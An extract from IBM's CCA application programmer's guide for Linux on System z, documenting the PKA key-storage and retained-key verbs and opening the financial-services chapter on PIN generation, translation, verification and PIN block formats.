definitions of the return_code, reason_code, exit_data_length, and exit_data parameters, see +“Parameters common to all verbs” on page 14. +rule_array_count +Direction: Input Type: Integer +| Apointer to an integer variable containing the number of elements in the rule_array variable. This +| value must be 0 or 1. +rule_array +Direction: Input Type: String +Keywords that provide control information to the verb. Each keyword is left-justified in 8-byte fields and +padded on the right with blanks.All keywords must be in contiguous storage. The rule_array keywords +are described in Table69. +Table69.KeywordsforPKAKeyRecordDeletecontrolinformation +Keyword Description +| Deletionmode(One,optional).Specifieswhethertherecordistobedeletedentirelyorwhetheronlyitscontentsare +| tobeerased. +LABEL-DL SpecifiestherecordwillbedeletedfromthePKAkeystoragefileentirely.Thisisthedefaultdeletion +mode. +TOKEN-DL Specifiesonlythecontentsoftherecordaretobedeleted.TherecordwillstillexistinthePKAkey +storagefile,butwillcontainonlybinaryzeros. +label +Direction: Input Type: String +The label of the record to be deleted, a 64-byte character string. +Restrictions +None +Required commands +| This verb requires the Key Test and Key Test2 command (offset X'001D') to be enabled in the active role. +290 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +PKA Key Record Delete (CSNDKRD) +Usage notes +None +Related information +See “Key storage with Linux for IBM System z, in contrast to z/OS for IBM System z” on page 263. +JNI version +This verb has a Java Native Interface (JNI) version, which is named CSNDKRDJ. See “Building Java +applications to use with the CCAJNI” on page 16. +The parameters for CSNDKRDJ are shown here. +Format +public native void CSNDKRDJ( +hikmNativeInteger return_code, +hikmNativeInteger reason_code, +hikmNativeInteger exit_data_length, +byte[] exit_data, +hikmNativeInteger rule_array_count, +byte[] rule_array, +byte[] key_identifier ); +Chapter8.Keystoragemechanisms 291 + +PKA Key Record List (CSNDKRL) +PKA Key Record List (CSNDKRL) +The PKAKey Record List verb creates a key-record-list file containing information about specified key +records in PKAkey-storage. Information includes whether record validation is correct, the type of key, and +the dates and times when the record was created and last updated. +Specify the key records to be listed using the key_label parameter. To identify multiple key records, use +the wild card (*) in a key label. +Note: To list all the labels in key storage, specify the key_label parameter with *, *.*, *.*.*, and so forth, +up to a maximum of seven name tokens (*.*.*.*.*.*.*). +This verb creates the list file and returns the name of the file and the length of the file name to the calling +application. This verb also returns the name of the security server where the file is stored. The PKAKey +Record List file has a header record, followed by 0 - n detail records, where n is the number of key +records with matching key labels. The file is kept in the /opt/IBM/CEX3C/keys/pkalist directory (assuming +the directory name was not changed during installation). These list files are created under the ownership +of the environment of the user that requests the list verb. Make sure the files created kept the same group +ID as your installation requires. This can also be achieved by setting the “set-group-id-on-execution” bit on +in this directory. See the g+s flags in the chmod command for full details. Not doing this might cause +errors to be returned on key-record-list verbs. +PKAkey records are stored in the external key-storage file defined by the CSUPKADS environment +variable. +For information concerning the location of the key-record-list directory, refer to the IBM 4764 PCI-X +Cryptographic Coprocessor CCASupport Program Installation Manual. +Format +CSNDKRL( +return_code, +reason_code, +exit_data_length, +edit_data, +rule_array_count, +rule_array, +key_label, +dataset_name_length, +dataset_name, +security_server_name ) +Parameters +For the definitions of the return_code, reason_code, exit_data_length, and exit_data parameters, see +“Parameters common to all verbs” on page 14. +rule_array_count +Direction: Input Type: Integer +Apointer to an integer variable containing the number of elements in the rule_array variable. This +value must be 0. +rule_array +Direction: Input Type:Array +| This parameter is ignored. +292 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +PKA Key Record List (CSNDKRL) +key_label +Direction: Output Type: String +The key_label parameter is a pointer to a string variable containing a key record in PKAkey-storage. +You can use a wild card (*) to identify multiple records in key storage. +dataset_name_length +Direction: Input Type: Integer +The dataset_name_length parameter is a pointer to an integer variable containing the number of bytes +of data returned in the dataset_name variable. The maximum returned length is 64 bytes. +dataset_name +Direction: Output Type: String +The dataset_name parameter is a pointer to a 64-byte string variable containing the name of the file +returned by the verb. The file contains the key-record information. +The verb returns the file name as a fully qualified file specification. +Note: When the verb stores a key-record-list file, it overlays any older file with the same name. +security_server_name +Direction: Output Type: String +The security_server_name parameter is a pointer to a string variable. The information in this variable +is not currently used, but the variable must be declared. +Restrictions +None +Required commands +| This verb requires the Key Test and Key Test2 command (offset X'001D') to be enabled in the active role. +Usage notes +None +Related information +See “Key storage with Linux for IBM System z, in contrast to z/OS for IBM System z” on page 263. +JNI version +This verb has a Java Native Interface (JNI) version, which is named CSNDKRLJ. See “Building Java +applications to use with the CCAJNI” on page 16. +The parameters for CSNDKRLJ are shown here. +Chapter8.Keystoragemechanisms 293 + +PKA Key Record List (CSNDKRL) +Format +public native void CSNDKRLJ( +hikmNativeInteger return_code, +hikmNativeInteger reason_code, +hikmNativeInteger exit_data_length, +byte[] exit_data, +hikmNativeInteger rule_array_count, +byte[] rule_array, +byte[] key_label, +hikmNativeInteger data_set_name_length, +byte[] data_set_name, +byte[] security_server_name ); +294 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +PKA Key Record Read (CSNDKRR) +PKA Key Record Read (CSNDKRR) +Reads a record from the PKAkey storage file and returns the content of the record. This is true even +when the record contains a null PKAtoken. +PKAkey records are stored in the external key-storage file defined by the CSUPKADS environment +variable. +Format +CSNDKRR( +return_code, +reason_code, +exit_data_length, +exit_data, +rule_array_count, +rule_array, +label, +token_length, +token ) +Parameters +For the definitions of the return_code, reason_code, exit_data_length, and exit_data parameters, see +“Parameters common to all verbs” on page 14. +rule_array_count +Direction: Input Type: Integer +Apointer to an integer variable containing the number of elements in the rule_array variable. This +value must be 0. +rule_array +Direction: Input Type: String +This parameter is ignored. +label +Direction: Input Type: String +The label of the record to be read, a 64-byte character string. +token_length +Direction: Input/Output Type: Integer +The length of the area to which the record is to be returned. On successful completion of this verb, +token_length will contain the actual length of the record returned. +token +Direction: Output Type: String +Area into which the returned record will be written. The area should be at least as long as the record. +Restrictions +None +Required commands +| This verb requires the Key Test and Key Test2 command (offset X'001D') to be enabled in the active role. +Chapter8.Keystoragemechanisms 295 + +PKA Key Record Read (CSNDKRR) +Usage notes +None +Related information +See “Key storage with Linux for IBM System z, in contrast to z/OS for IBM System z” on page 263. +JNI version +This verb has a Java Native Interface (JNI) version, which is named CSNDKRRJ. See “Building Java +applications to use with the CCAJNI” on page 16. +The parameters for CSNDKRRJ are shown here. +Format +public native void CSNDKRRJ( +hikmNativeInteger return_code, +hikmNativeInteger reason_code, +hikmNativeInteger exit_data_length, +byte[] exit_data, +hikmNativeInteger rule_array_count, +byte[] rule_array, +byte[] key_label, +hikmNativeInteger key_token_length, +byte[] key_token ); +296 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +PKA Key Record Write (CSNDKRW) +PKA Key Record Write (CSNDKRW) +Writes over an existing record in the PKAkey storage file. +PKAkey records are stored in the external key-storage file defined by the CSUPKADS environment +variable. +Format +CSNDKRW( +return_code, +reason_code, +exit_data_length, +exit_data, +rule_array_count, +rule_array, +label, +token_length, +token ) +Parameters +For the definitions of the return_code, reason_code, exit_data_length, and exit_data parameters, see +“Parameters common to all verbs” on page 14. +rule_array_count +Direction: Input Type: Integer +Apointer to an integer variable containing the number of elements in the rule_array variable. This +value must be 0 or 1. +rule_array +Direction: Input Type: String +Keywords that provide control information to the verb. Each keyword is left-justified in 8-byte fields and +padded on the right with blanks.All keywords must be in contiguous storage. The rule_array keywords +are described in Table70. +Table70.KeywordsforPKAKeyRecordWritecontrolinformation +Keyword Description +| Writemode(One,optional).Specifiesthecircumstancesunderwhichtherecordistobewritten. +CHECK SpecifiestherecordwillbewrittenonlyifarecordoftypeNULLwiththesamelabelexistsinthePKA +keystoragefile.Ifsucharecordexists,itisoverwritten.Thisisthedefaultcondition. +OVERLAY Specifiestherecordwillbeoverwrittenregardlessofthecurrentcontentoftherecord.Ifarecordwith +thesamelabelexistsinthePKAkeystoragefile,isoverwritten. +label +Direction: Input Type: String +The label of the record to be overwritten, a 64-byte character string. +token_length +Direction: Input Type: Integer +The length of the field containing the token to be written to the PKAkey storage file. +token +Chapter8.Keystoragemechanisms 297 + +PKA Key Record Write (CSNDKRW) +Direction: Input Type: String +The data to be written to the PKAkey storage file, which is an RSAprivate token in either external or +internal format, or an RSApublic token. +Restrictions +None +Required commands +| This verb requires the Key Test and Key Test2 command (offset X'001D') to be enabled in the active role. +Usage notes +None +Related information +See “Key storage with Linux for IBM System z, in contrast to z/OS for IBM System z” on page 263. +JNI version +This verb has a Java Native Interface (JNI) version, which is named CSNDKRWJ. See “Building Java +applications to use with the CCAJNI” on page 16. +The parameters for CSNDKRWJ are shown here. +Format +public native void CSNDKRWJ( +hikmNativeInteger return_code, +hikmNativeInteger reason_code, +hikmNativeInteger exit_data_length, +byte[] exit_data, +hikmNativeInteger rule_array_count, +byte[] rule_array, +byte[] key_label, +hikmNativeInteger key_token_length, +byte[] key_token ); +298 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Retained Key Delete (CSNDRKD) +Retained Key Delete (CSNDRKD) +Use this verb to delete a PKAkey-record currently retained within the cryptographic engine. +Both public and private keys can be retained within the cryptographic engine using verbs such as PKAKey +Generate and PKAPublic Key Register.Alist of retained keys can be obtained using the Retained Key +List verb. +IMPORTANT +Before using this verb, see the information about retained keys in “Using retained keys.” +Format +CSNDRKD( +return_code, +reason_code, +exit_data_length, +exit_data, +rule_array_count, +rule_array, +key_label ) +Parameters +For the definitions of the return_code, reason_code, exit_data_length, and exit_data parameters, see +“Parameters common to all verbs” on page 14. +rule_array_count +Direction: Input Type: Integer +Apointer to an integer variable containing the number of elements in the rule_array variable. This +value must be 0. +rule_array +Direction: Input Type: String +| This parameter is ignored. +key_label +Direction: Input Type: String +Apointer to a string variable containing the key label of a PKAkey-record that has been retained +within the cryptographic engine. The use of a wild card in the key_label variable is not permitted. +Using retained keys +Retained key use is discouraged on the IBM System z platform because a retained key can exist only in +one CEX3C Cryptographic adapter, by definition. +v This has potential problems: +– The key cannot be exported, so it cannot be backed up. +– The key cannot be exported to another card in the same group, so operations concerning the +retained key cannot participate in load-balancing. +– There is an exception to the above points, in that keys generated in a deterministic fashion using +externally saved regeneration data (it is possible to save so-called 'regen data' securely) can be +recreated from that data or created in multiple cards across a card group. +Chapter8.Keystoragemechanisms 299 + +Retained Key Delete (CSNDRKD) +However, this is a very sophisticated topic, and is beyond the scope of this document.Also, the +complexity required to implement this properly, as well as the sophistication involved in its data +management, present formidable obstacles. +Retained key support is offered in this release, however. The following verbs work with retained keys: +v “PKAKey Generate (CSNDPKG)” on page 370 generates an RSAretained key. The same restrictions +that Integrated Cryptographic Service Facility (ICSF) has for retained key creation are implemented +here. These are: +– Notice that PKAKey Token Build will let you create 'key-mgmt' skeleton key tokens, and this is as +designed. You can still pass these to PKAKey Generate and have a key pair created. What is not +allowed is specifying that this 'key-mgmt' token is to be generated in PKAKey Generate as a +RETAIN key token: a retained key. Such an attempt will fail with error 12 reason code 3046. +– The maximum modulus size is 2048 bits. +– The usage flags are restricted to signature generation. +Specifically, key management usage for retained keys is not allowed because of the dangers of +losing your key encrypting key (kek) for important keys, when that kek exists only inside a single +adapter. +v “Retained Key List (CSNDRKL)” on page 301 lists the retained keys inside an adapter. +v “Retained Key Delete (CSNDRKD)” on page 299 deletes a retained key from adapter internal storage. +Restrictions +None +Required commands +| This verb requires the Retained Key Delete command (offset X'0203'') to be enabled in the active role. +Usage notes +None +Related information +See “Key storage with Linux for IBM System z, in contrast to z/OS for IBM System z” on page 263. +JNI version +This verb has a Java Native Interface (JNI) version, which is named CSNDRKDJ. See “Building Java +applications to use with the CCAJNI” on page 16. +The parameters for CSNDRKDJ are shown here. +Format +public native void CSNDRKDJ ( +hikmNativeInteger return_code, +hikmNativeInteger reason_code, +hikmNativeInteger exit_data_length, +byte[] exit_data, +hikmNativeInteger rule_array_count, +byte[] rule_array, +byte[] key_label ); +300 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Retained Key List (CSNDRKL) +Retained Key List (CSNDRKL) +Use this verb to list the key labels of selected PKAkey records that have been retained within the +cryptographic engine. +Specify the keys to be listed using the key_label_mask variable. To identify multiple keys, use a wild card +(*) in the mask. Only labels with matching characters to those in the mask up to the first “*” is returned. To +list all retained key labels, specify a mask of an *, followed by 63 space characters. For example, if the +cryptographic engine has retained key labels a.a, a.a1, a.b.c.d, and z.a, and you specify the mask a.*, the +verb returns a.a, a.a1 and a.b.c.d. If you specify a mask of a.a*, the verb returns a.a and a.a1. +To retain PKAkeys within the coprocessor, use the PKAKey Generate and the PKAPublic Key Register +verbs. To delete retained keys from the coprocessor, use the Retained Key Delete verb. +IMPORTANT +Before using this verb, see the information about retained keys in “Using retained keys” on page 299. +Format +CSNDRKL( +return_code, +reason_code, +exit_data_length, +exit_data, +rule_array_count, +rule_array, +key_label_mask, +retained_keys_count, +key_labels_count, +key_labels ) +Parameters +For the definitions of the return_code, reason_code, exit_data_length, and exit_data parameters, see +“Parameters common to all verbs” on page 14. +rule_array_count +Direction: Input Type: Integer +Apointer to an integer variable containing the number of elements in the rule_array variable. This +value must be 0. +rule_array +Direction: Input Type:Array +| This parameter is ignored. +key_label_mask +Direction: Input Type: String +Apointer to a string variable containing a key-label mask that is used to filter the list of key names +returned by the verb. Use a wild card (*) to identify multiple key records retained within the +coprocessor. +retained_keys_count +Direction: Input/Output Type: Integer +Chapter8.Keystoragemechanisms 301 + +Retained Key List (CSNDRKL) +Apointer to an integer variable to receive the total number of retained-key records stored within the +coprocessor. +key_labels_count +Direction: Input/Output Type: Integer +Apointer to an integer variable which on input defines the maximum number of key labels to be +returned, and which on output defines the number of key labels returned by the coprocessor. +key_labels +Direction: Output Type:Array +Apointer to a string array variable containing the returned key labels. The coprocessor returns zero or +more 64-byte array elements, each of which contains the key label of a PKAkey-record retained within +the coprocessor. +Restrictions +None +Required commands +| This verb requires the Retained Key List command (offset X'0230'') to be enabled in the active role. +Usage notes +None +Related information +See “Key storage with Linux for IBM System z, in contrast to z/OS for IBM System z” on page 263. +JNI version +This verb has a Java Native Interface (JNI) version, which is named CSNDRKLJ. See “Building Java +applications to use with the CCAJNI” on page 16. +The parameters for CSNDRKLJ are shown here. +Format +public native void CSNDRKLJ ( +hikmNativeInteger return_code, +hikmNativeInteger reason_code, +hikmNativeInteger exit_data_length, +byte[] exit_data, +hikmNativeInteger rule_array_count, +byte[] rule_array, +byte[] key_label_mask, +hikmNativeInteger retained_keys_count, +hikmNativeInteger key_labels_count, +byte[] key_labels ); +302 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Chapter 9. Financial services +The process of validating personal identities in a financial transaction system is called personal +authentication. The personal identification number (PIN) is the basis for verifying the identity of a customer +across financial industry networks. CCAprovides verbs to translate, verify, and generate PINs. You can +use the verbs to prevent unauthorized disclosures when organizations handle PINs. +The following verbs are described in this chapter: +v “Clear PIN Encrypt (CSNBCPE)” on page 312 +v “Clear PIN Generate (CSNBPGN)” on page 315 +v “Clear PIN GenerateAlternate (CSNBCPA)” on page 318 +v “CVV Generate (CSNBCSG)” on page 322 +v “CVV Verify (CSNBCSV)” on page 325 +v “Encrypted PIN Generate (CSNBEPG)” on page 328 +v “Encrypted PIN Translate (CSNBPTR)” on page 332 +v “Encrypted PIN Verify (CSNBPVR)” on page 338 +v “PIN Change/Unblock (CSNBPCU)” on page 342 +v “Secure Messaging for Keys (CSNBSKY)” on page 348 +v “Secure Messaging for PINs (CSNBSPN)” on page 351 +v “Transaction Validation (CSNBTRV)” on page 355 +How personal identification numbers (PINs) are used +Many people are familiar with PINs, which are used to access an automated teller machine (ATM). From +the system point of view, PINs are used primarily in financial networks to authenticate users. Typically, a +user is assigned a PIN and enters the PIN at automated teller machines (ATMs) to gain access to his or +her accounts. It is extremely important that the PIN be kept private so no one other than the account +owner can use it. CCAallows your applications to generate PINs, to verify supplied PINs, and to translate +PINs from one format or encryption key to another. +How VISA card verification values are used +The Visa International ServiceAssociation (VISA) and MasterCard International, Incorporated have +specified a cryptographic method to calculate a value that relates to the personal account number (PAN), +the card expiration date, and the service code. The VISAcard-verification value (CVV) and the MasterCard +card-verification code (CVC) can be encoded on either track 1 or track 2 of a magnetic striped card and +are used to detect forged cards. Because most online transactions use track-2, the CCAverbs generate +and verify the CVV2 by the track-2 method. +The VISACVV Generate verb calculates a 1-byte to 5-byte value through the DES-encryption of the PAN, +the card expiration date, and the service code using two data-encrypting keys or two MAC keys. The VISA +CVV Verify verb calculates the CVV by the same method, compares it to the CVV supplied by the +application (which reads the credit card's magnetic stripe) in the CVV_value, and issues a return code that +indicates whether the card is authentic. +2.TheVISACVVandtheMasterCardCVCrefertothesamevalue.CVVisusedheretomeanbothCVVandCVC. +©CopyrightIBMCorp.2007,2011 303 + +Translating data and PINs in networks +More and more data is being transmitted across networks where, for various reasons, the keys used on +one network cannot be used on another network. Encrypted data and PINs that are transmitted across +these boundaries must be “translated” securely from encryption under one key to encryption under another +key. For example, a traveler visiting a foreign city might want to use anATM to access an account at +home. The PIN entered at theATM might need to be encrypted at theATM and sent over one or more +financial networks to the traveler's home bank.At the home bank, the PIN must be verified before access +is allowed. On intermediate systems (between networks), applications can use the Encrypted PIN +Translate verb to re-encrypt a PIN block from one key to another. Running on CCA, such applications can +ensure that PINs never appear in the clear and that the PIN-encrypting keys are isolated on their own +networks. +Working with Europay-Mastercard-Visa Smart cards +| +| There are several verbs you can use in secure communications with Europay-Mastercard-Visa (EMV) +| smart cards. The processing capabilities are consistent with the specifications provided in these +| documents: +| v EMV 2000 Integrated Circuit Card Specification for Payment Systems Version 4.0 (EMV4.0) Book 2 +| v Design Visa Integrated Circuit Card Specification Manual +| v Integrated Circuit Card Specification (VIS) 1.4.0 Corrections +| EMV smart cards include the following processing capabilities: +| v The Diversified Key Generate verb with rule-array options TDES-XOR, TDESEMV2, and TDESEMV4 +| enables you to derive a key used to cipher and authenticate messages, and more particularly message +| parts, for exchange with an EMV smart card. You use the derived key with verbs such as: Encipher, +| Decipher, MAC Generate, MAC Verify, Secure Messaging for Keys, and Secure Messaging for PINs. +| These message parts can be combined with message parts created using the Secure Messaging for +| Keys and Secure Messaging for PINs verbs. +| v The Secure Messaging for Keys verb enables secure incorporation of a key into a message part +| (generally the value portion of a TLV component of a secure message for a card). Similarly, the Secure +| Messaging for PINs verb enables secure incorporation of a PIN block into a message part. +| v PIN Change/Unblock verb enables encryption of a new PIN to send to a new EMV card, or to update +| the PIN value on an initialized EMV card. This verb generates both the required session key (from the +| master encryption key) and the required authentication code (from the master authentication key). +| v The ZERO-PAD option of the PKAEncrypt enables validation of a digital signature created according to +| ISO 9796-2 standard by encrypting information that you format, including a hash value of the message +| to be validated. You compare the resulting enciphered data to the digital signature accompanying the +| message to be validated. +| v The MAC Generate and MAC Verify verbs post-pad a X'80'...X'00' string to a message as required for +| authenticating messages exchanged with EMV smart cards. +PIN verbs +You use the PIN verbs to generate, verify, and translate PINs. This section discusses the PIN verbs, as +well as the various PIN algorithms and PIN block formats supported by CCA. It also explains the use of +PIN-encrypting keys. +Generating a PIN +To generate personal identification numbers, call the Clear PIN Generate or Encrypted PIN Generate verb. +Using a PIN generation algorithm, data used in the algorithm, and the PIN generation key, the Clear PIN +Generate verb generates a clear PIN and a PIN verification value, or offset. Using a PIN generation +304 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +algorithm, data used in the algorithm, the PIN generation key, and an outbound PIN encrypting key, the +Encrypted PIN Generate verb generates and formats a PIN and encrypts the PIN block. +Encrypting a PIN +To format a PIN into a supported PIN block format and encrypt the PIN block, call the Clear PIN Encrypt +verb. +Generating a PIN validation value from an encrypted PIN block +To generate a clear VISAPIN validation value (PVV) from an encrypted PIN block, call the Clear PIN +GenerateAlternate verb. The PIN block can be encrypted under an input PIN-encrypting key (IPINENC) or +an output PIN encrypting key (OPINENC). +Verifying a PIN +To verify a supplied PIN, call the Encrypted PIN Verify verb. You supply the enciphered PIN, the +PIN-encrypting key that enciphers the PIN, and other data. You must also specify the PIN verification key +and PIN verification algorithm. The Encrypted PIN Verify verb generates a verification PIN. This verb +compares the two personal identification numbers and if they are the same, it verifies the supplied PIN. +Translating a PIN +To translate a PIN block format from one PIN-encrypting key to another or from one PIN block format to +another, call the Encrypted PIN Translate verb. You must identify the input PIN-encrypting key that +originally enciphered the PIN. You also need to specify the output PIN-encrypting key that you want the +verb to use to encipher the PIN. If you want to change the PIN block format, specify a different output PIN +block format from the input PIN block format. +Algorithms for generating and verifying a PIN +CCAsupports the following algorithms for generating and verifying personal identification numbers: +v IBM 3624 institution-assigned PIN +v IBM 3624 customer-selected PIN (through a PIN offset) +v IBM German Bank Pool PIN (verify through an institution key) +v VISAPIN through a VISAPIN validation value +v Interbank PIN +The algorithms are discussed in detail inAppendixE, “PIN formats and algorithms,” on page 477. +Using PINs on different systems +CCAallows you to translate different PIN block formats, which lets you use personal identification numbers +on different systems. CCAsupports the following formats: +v IBM 3624 +v IBM 3621 (same as IBM 5906) +v IBM 4704 encrypting PINPAD format +v ISO 0 (same asANSI 9.8, VISA1, and ECI 1) +v ISO 1 (same as ECI 4) +v ISO 2 +v VISA2 +v VISA3 +v VISA4 +v ECI 2 +Chapter9.Financialservices 305 + +v ECI 3 +The algorithms are discussed in detail inAppendixE, “PIN formats and algorithms,” on page 477. +PIN-Encrypting keys +Aunique master key variant enciphers each type of key. +Note that the PIN block variant constant (PBVC) are not supported in this version of CCA. +Derived unique key per transaction algorithms +CCAsupportsANSI X9.24 derived unique key per transaction algorithms to generate PIN-encrypting keys +from user data. CCAsupports both single-length and double-length key generation. Keywords for +single-length and double-length key generation cannot be mixed. +Encrypted PIN Translate +The UKPTIPIN, IPKTOPIN, and UKPTBOTH keywords will cause the verb to generate single-length keys. +DUKPT-IP, DKPT-OP, and DUKPT-BH are the respective keywords to generate double-length keys. The +input_PIN_profile and output_PIN_profile parameters must supply the current key serial number when +these keywords are specified. +Encrypted PIN Verify +The UKPTIPIN keyword will cause the verb to verify single-length keys. DUKPT-IP is the keyword for +double-length key generation. The input_PIN_profile parameter must supply the current key serial number +when these keywords are specified. +ANSI X9.8 PIN restrictions +| +| Three new access control points have been added to implement the PIN-block processing restrictions of +| theANSI X9.8 standard implemented in CCA4.1.0. These access control points are available on the IBM +| z196 with the CEX3C feature. These access control points are disabled in the default role.ATKE +| Workstation is required to enable them. +| These are the three new access control points: +| v ANSI X9.8 PIN - Enforce PIN block restrictions (X'0350') +| v ANSI X9.8 PIN -Allow modification of PAN_01_0350 (X'0351') +| v ANSI X9.8 PIN -Allow onlyANSI PIN blocks_01_0350 (X'0352') +| These verbs are affected by the new access control points: +| v Clear PIN GenerateAlternate (CSNBCPA) +| v Encrypted PIN Translate (CSNBPTR) +| v Secure Messaging for PINs (CSNBSPN) +ANSI X9.8 PIN - Enforce PIN block restrictions +| +| WhenANSI X9.8 PIN - Enforce PIN block restrictions access control point is enable, the following +| restrictions will be enforced: +| v The Encrypted PIN Translate and Secure Messaging for PINs verbs will not accept IBM 3624 PIN +| format in the output profile parameter when the input profile parameter is not IBM 3624. +| v The Encrypted PIN Translate verb will not accept ISO-0 or ISO-3 formats in the input PIN profile unless +| ISO-0 or ISO-3 is in the output PIN profile. +| v The Encrypted PIN Translate and Secure Messaging for PINs verbs will not accept ISO-1 or ISO-2 +| formats in the output profile parameter when the input profile parameter contains ISO-0, ISO-3, or +| VISA4. +306 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +| v When the input profile parameter for the Encrypted PIN Translate and Secure Messaging for PINs verbs +| contains either ISO-0 or ISO-3 formats, the PAN within the decrypted PIN block will be extracted. This +| PAN must be the same as the PAN that was supplied as the input PAN parameter, and this PAN must +| be the same as the PAN supplied as the output PAN parameter. +| v The input PAN and output PAN parameters for the Encrypted PIN Translate and Secure Messaging for +| PINs verbs must be equivalent. +| v When the rule array for the Clear PIN GenerateAlternate verb contains VISA-PVV, the input PIN profile +| must contain ISO-0 or ISO-3 formats. +ANSI X9.8 PIN - Allow modification of PAN +| +| In order to enable theANSI X9.8 PIN -Allow modification of PAN access control point, theANSI X9.8 PIN +| - Enforce PIN block restrictions must also be enabled. TheANSI X9.8 PIN -Allow modification of PAN +| access control point cannot be enabled by itself. +| When theANSI X9.8 PIN -Allow modification of PAN access control point is enabled, the input PAN and +| output PAN parameters will be tested in the Encrypted PIN Translate and Secure Messaging for PINs +| verbs. The input PAN will be compared to the portions of the PAN that are recoverable from the decrypted +| PIN block. If the PANs are the same, the account number will be changed in the output PIN block. +ANSI X9.8 PIN - Allow only ANSI PIN blocks +| +| In order to enable theANSI X9.8 PIN -Allow onlyANSI PIN blocks access control point, theANSI X9.8 +| PIN - Enforce PIN block restrictions must also be enabled. TheANSI X9.8 PIN -Allow onlyANSI PIN +| blocks access control point cannot be enabled by itself. +| When this access control point is enabled, the Encrypted PIN Translate verb will allow reformatting of the +| PIN block as shown in Table71. +|| Table71.ANSIX9.8PIN-AllowonlyANSIPINblocks +|||| Reformatto: ISOFormat0 ISOFormat1 ISOFormat3 +| Reformatfrom: +|||| ISOFormat0 Reformatpermitted.ChangeofPAN Notpermitted Reformatpermitted.ChangeofPAN +|| notpermitted notpermitted. +|||| ISOFormat1 Reformatpermitted Reformat Reformatpermitted +| permitted +|||| ISOFormat3 Reformatpermitted.ChangeofPAN Notpermitted Reformatpermitted.ChangeofPAN +|| notpermitted. notpermitted. +| +| +The PIN profile +The PIN profile consists of the following: +v PIN block format (see “PIN block format” on page 308) +v Format control (see “Format control” on page 309) +v Pad digit (see “Pad digit” on page 310) +v Current Key Serial Number (for UKPT and DUKPT – see “Current key serial number” on page 310) +Table72 shows the format of a PIN profile. +Table72.FormatofaPINprofile +Bytes Description +0-7 PINblockformat +8-15 Formatcontrol +Chapter9.Financialservices 307 + +Table72.FormatofaPINprofile (continued) +Bytes Description +16-23 Paddigit +24-47 CurrentKeySerialNumber(forUKPTandDUKPT) +PIN block format +This keyword specifies the format of the PIN block. The 8-byte value must be left-justified and padded with +blanks. Refer to Table73 for a list of valid values. +Table73.FormatvaluesofPINblocks +FormatValue Description +ECI-2 EurochequeInternationalformat2 +ECI-3 EurochequeInternationalformat3 +ISO-0 ISOformat0,ANSIX9.8,VISA1,andECI1 +ISO-1 ISOformat1andECI4 +ISO-2 ISOformat2 +ISO-3 ISOformat3 +VISA-2 VISAformat2 +VISA-3 VISAformat3 +VISA-4 VISAformat4 +3621 IBM3621and5906 +3624 IBM3624 +4704-EPP IBM4704encryptingPINpad +PIN block format and PIN extraction method keywords +In the Clear PIN GenerateAlternate, Encrypted PIN Translate, and Encrypted PIN Verify verbs, you can +specify a PIN extraction keyword for a given PIN block format. In the table below, the allowable PIN +extraction methods are listed for each PIN block format. The first PIN extraction method keyword listed for +a PIN block format is the default. Refer to Table74 for a list of valid values. +Table74.PINblockformatandPINextractionmethodkeywords +PINblock PINextraction Description +Format methodkeywords +ECI-2 PINLEN04 ThePINextractionmethodkeywordsspecifyaPINextractionmethodfora +PINLEN04format. +ECI-3 PINBLOCK ThePINextractionmethodkeywordsspecifyaPINextractionmethodfora +PINBLOCKformat. +ISO-0 PINBLOCK ThePINextractionmethodkeywordsspecifyaPINextractionmethodfora +PINBLOCKformat. +ISO-1 PINBLOCK ThePINextractionmethodkeywordsspecifyaPINextractionmethodfora +PINBLOCKformat. +ISO-2 PINBLOCK ThePINextractionmethodkeywordsspecifyaPINextractionmethodfora +PINBLOCKformat. +ISO-3 PINBLOCK ThePINextractionmethodkeywordsspecifyaPINextractionmethodfora +PINBLOCKformat. +VISA-2 PINBLOCK ThePINextractionmethodkeywordsspecifyaPINextractionmethodfora +PINBLOCKformat. +308 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Table74.PINblockformatandPINextractionmethodkeywords (continued) +PINblock PINextraction Description +Format methodkeywords +VISA-3 PINBLOCK ThePINextractionmethodkeywordsspecifyaPINextractionmethodfora +PINBLOCKformat. +VISA-4 PINBLOCK ThePINextractionmethodkeywordsspecifyaPINextractionmethodfora +PINBLOCKformat. +3621 PADDIGIT, ThePINextractionmethodkeywordsspecifyaPINextractionmethodforan +HEXDIGIT, IBM3621PINblockformat.Thefirstkeyword,PADDIGIT,isthedefaultPIN +PINLEN04to extractionmethodforthePINblockformat. +PINLEN12, +PADEXIST +3624 PADDIGIT, ThePINextractionmethodkeywordsspecifyaPINextractionmethodforan +HEXDIGIT, IBM3624PINblockformat.Thefirstkeyword,PADDIGIT,isthedefaultPIN +PINLEN04to extractionmethodforthePINblockformat. +PINLEN16, +PADEXIST +4704-EPP PINBLOCK ThePINextractionmethodkeywordsspecifyaPINextractionmethodfora +PINBLOCKformat. +| Enhanced PIN security mode +| An enhanced PIN security mode is available. This optional mode is selected by enabling the PTR +| Enhanced PIN Security (offset X'0313') access control point in the CEX2C or CEX3C default role. When +| active, this control point affects all PIN verbs that extract or format a PIN using a PIN-block format of +| 3621or 3624 with a PIN-extraction method of PADDIGIT. +| Table75 summarizes the verbs affected by the enhanced PIN security mode, and describes the effect that +| the mode has when the access control point is enabled. +|| Table75.VerbsaffectedbyenhancedPINsecuritymode +|| PIN-blockformatand PINprocessingchangeswhenEnhancedPIN +||| PIN-extractionmethod Affectedverbs SecurityModeenabled +||| ECI-2,3621,or3624 Clear PIN Generate Alternate ThePINLENnnkeywordintherule_arrayparameterfor +||| formatsANDPINLENnn Encrypted PIN Translate PINextractionmethodisnotallowediftheEnhanced +|| Encrypted PIN Verify PINSecurityModeisenabled. +| Note: Theverbwillfailwithreturncode8andreason +| 